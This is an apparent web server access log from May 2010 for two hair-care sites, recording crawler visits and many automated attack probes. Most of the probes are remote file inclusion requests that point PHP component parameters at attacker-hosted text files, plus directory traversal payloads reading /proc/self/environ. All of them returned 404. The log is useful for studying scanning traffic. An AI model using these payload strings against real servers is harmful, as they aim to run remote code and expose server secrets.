77.93.2.81 - - [02/May/2010:17:06:12 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00" "www.freehairsecrets.com"
77.93.2.81 - - [02/May/2010:17:06:12 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00" "www.freehairsecrets.com"
62.128.135.38 - - [02/May/2010:17:06:20 -0700] "GET /http://www.lamourencouleurs.fr/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
62.128.135.38 - - [02/May/2010:17:06:30 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.lamourencouleurs.fr/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:17:10:07 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13969 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
62.128.135.38 - - [02/May/2010:17:18:07 -0700] "GET /logs/access_100315.log/http://www.lamourencouleurs.fr/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
62.128.135.38 - - [02/May/2010:17:18:07 -0700] "GET /http://www.lamourencouleurs.fr/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
62.128.135.38 - - [02/May/2010:17:18:07 -0700] "GET /logs/http://www.lamourencouleurs.fr/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
62.128.135.38 - - [02/May/2010:17:18:21 -0700] "GET /logs/access_100315.log//include/print_category.php?setup[use_category]=1&dir=http://www.lamourencouleurs.fr/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
62.128.135.38 - - [02/May/2010:17:18:22 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.lamourencouleurs.fr/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
62.128.135.38 - - [02/May/2010:17:18:22 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.lamourencouleurs.fr/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:17:31:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13120 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:17:43:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13331 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
79.174.78.178 - - [02/May/2010:17:44:19 -0700] "GET /logs/access_100412.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
79.174.78.178 - - [02/May/2010:17:44:19 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
79.174.78.178 - - [02/May/2010:17:44:20 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
79.174.78.178 - - [02/May/2010:17:44:20 -0700] "GET /logs/access_100412.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
79.174.78.178 - - [02/May/2010:17:44:20 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
79.174.78.178 - - [02/May/2010:17:44:20 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.225.152.124 - - [02/May/2010:17:46:11 -0700] "GET /good.php?board_skin_path=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.225.152.124 - - [02/May/2010:17:46:11 -0700] "GET /logs//good.php?board_skin_path=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.225.152.124 - - [02/May/2010:17:46:11 -0700] "GET /logs/access.log//good.php?board_skin_path=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.225.152.124 - - [02/May/2010:17:46:52 -0700] "GET /good.php?board_skin_path=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.225.152.124 - - [02/May/2010:17:46:52 -0700] "GET /logs//good.php?board_skin_path=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.225.152.124 - - [02/May/2010:17:46:52 -0700] "GET /logs/access.log//good.php?board_skin_path=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
119.235.237.86 - - [02/May/2010:17:49:09 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12296 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
119.235.237.19 - - [02/May/2010:17:49:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16404 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:17:55:18 -0700] "GET //index.php/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
124.217.229.185 - - [02/May/2010:17:59:16 -0700] "GET //index.php/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:18:02:23 -0700] "GET /logs/access.log///index.php/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:18:02:23 -0700] "GET //index.php/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:18:02:23 -0700] "GET /logs///index.php/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
124.217.229.185 - - [02/May/2010:18:08:11 -0700] "GET /logs/access.log///index.php/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
124.217.229.185 - - [02/May/2010:18:08:12 -0700] "GET //index.php/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
124.217.229.185 - - [02/May/2010:18:08:13 -0700] "GET /logs///index.php/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:18:11:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4943 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
208.82.117.228 - - [02/May/2010:18:13:34 -0700] "GET /logs/access_100125.log///index.php/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
77.93.2.81 - - [02/May/2010:18:23:38 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
220.181.7.41 - - [02/May/2010:18:23:40 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4850 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
77.93.2.81 - - [02/May/2010:18:23:42 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
119.235.237.20 - - [02/May/2010:18:25:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13629 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
124.217.229.185 - - [02/May/2010:18:27:05 -0700] "GET /logs/access_100125.log///index.php/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
62.128.135.38 - - [02/May/2010:18:29:21 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.psycho-prat.fr/logs/bovsp.txt?&mode=id HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
210.127.253.75 - - [02/May/2010:18:30:59 -0700] "GET /index.php?meio=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
210.127.253.75 - - [02/May/2010:18:33:37 -0700] "GET /logs/access_100419.log/index.php?meio=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
210.127.253.75 - - [02/May/2010:18:33:37 -0700] "GET /index.php?meio=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:18:36:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13987 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
78.110.50.120 - - [02/May/2010:18:37:25 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [02/May/2010:18:37:25 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.120 - - [02/May/2010:18:37:25 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://freetrannydownloads.com/linktrade/lc1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [02/May/2010:18:37:29 -0700] "GET /components/com_flyspray/startdown.php?file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:18:37:29 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:18:37:29 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [02/May/2010:18:37:33 -0700] "GET /index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:18:37:39 -0700] "GET /logs/access_100412.log//components/com_flyspray/startdown.php?file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:18:37:39 -0700] "GET /logs/access_100426.log%20%20//components/com_flyspray/startdown.php?file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:18:37:39 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:18:37:39 -0700] "GET /components/com_flyspray/startdown.php?file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:18:37:43 -0700] "GET /components/com_flyspray/startdown.php?file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:18:37:43 -0700] "GET /logs/access_100426.log%20%20//components/com_flyspray/startdown.php?file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:18:37:43 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [02/May/2010:18:38:06 -0700] "GET /index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:18:38:10 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:18:38:16 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:18:40:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13480 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
115.68.20.197 - - [02/May/2010:18:40:58 -0700] "GET /logs/access_100419.log/index.php?meio=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
115.68.20.197 - - [02/May/2010:18:40:59 -0700] "GET /index.php?meio=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
115.68.20.197 - - [02/May/2010:18:41:00 -0700] "GET /logs/index.php?meio=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
119.235.237.18 - - [02/May/2010:18:44:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=11099 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
121.88.4.141 - - [02/May/2010:18:59:59 -0700] "GET /index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
210.127.253.75 - - [02/May/2010:19:00:08 -0700] "GET /logs/access_100419.log/index.php?meio=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
210.127.253.75 - - [02/May/2010:19:00:09 -0700] "GET /index.php?meio=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
210.127.253.75 - - [02/May/2010:19:00:09 -0700] "GET /logs/index.php?meio=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:19:00:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5574 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
121.88.4.141 - - [02/May/2010:19:00:58 -0700] "GET /index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:01:52 -0700] "GET /index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:02:44 -0700] "GET /index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:02:53 -0700] "GET /index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:03:01 -0700] "GET /index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
94.23.58.133 - - [02/May/2010:19:05:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:05:43 -0700] "GET /index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:19:06:34 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:19:06:34 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:19:06:34 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:19:06:36 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:19:06:36 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [02/May/2010:19:06:36 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:07:04 -0700] "GET /index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:19:09:41 -0700] "GET //appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:19:09:41 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:19:09:41 -0700] "GET /logs/access_100125.log///appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:19:10:07 -0700] "GET /index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:19:10:19 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.59.164.98 - - [02/May/2010:19:10:20 -0700] "GET //appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.59.164.98 - - [02/May/2010:19:10:20 -0700] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [02/May/2010:19:10:26 -0700] "GET /logs/access.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [02/May/2010:19:10:26 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [02/May/2010:19:10:26 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [02/May/2010:19:10:27 -0700] "GET /logs/access.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [02/May/2010:19:10:27 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [02/May/2010:19:10:27 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.70 - - [02/May/2010:19:11:51 -0700] "GET /logs/access.log//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [02/May/2010:19:11:52 -0700] "GET /index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [02/May/2010:19:11:52 -0700] "GET /logs//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [02/May/2010:19:12:31 -0700] "GET /logs/access.log//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [02/May/2010:19:12:32 -0700] "GET /index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [02/May/2010:19:12:32 -0700] "GET /logs//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:19:14:04 -0700] "GET //appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:19:14:04 -0700] "GET /logs/access_100125.log///appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:19:14:07 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.58.133 - - [02/May/2010:19:14:12 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.58.133 - - [02/May/2010:19:14:12 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.58.133 - - [02/May/2010:19:14:12 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:19:14:39 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:19:14:39 -0700] "GET //appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:19:14:42 -0700] "GET /logs/access_100125.log///appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.237.86 - - [02/May/2010:19:17:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18916 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
209.59.164.98 - - [02/May/2010:19:19:25 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:19:19:25 -0700] "GET /logs/access_100125.log///appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:19:19:25 -0700] "GET //appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.210 - - [02/May/2010:19:21:39 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "growlonghairfast.com"
91.212.226.210 - - [02/May/2010:19:21:39 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "growlonghairfast.com"
209.59.164.98 - - [02/May/2010:19:24:54 -0700] "GET //appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.59.164.98 - - [02/May/2010:19:24:55 -0700] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.59.164.98 - - [02/May/2010:19:24:55 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
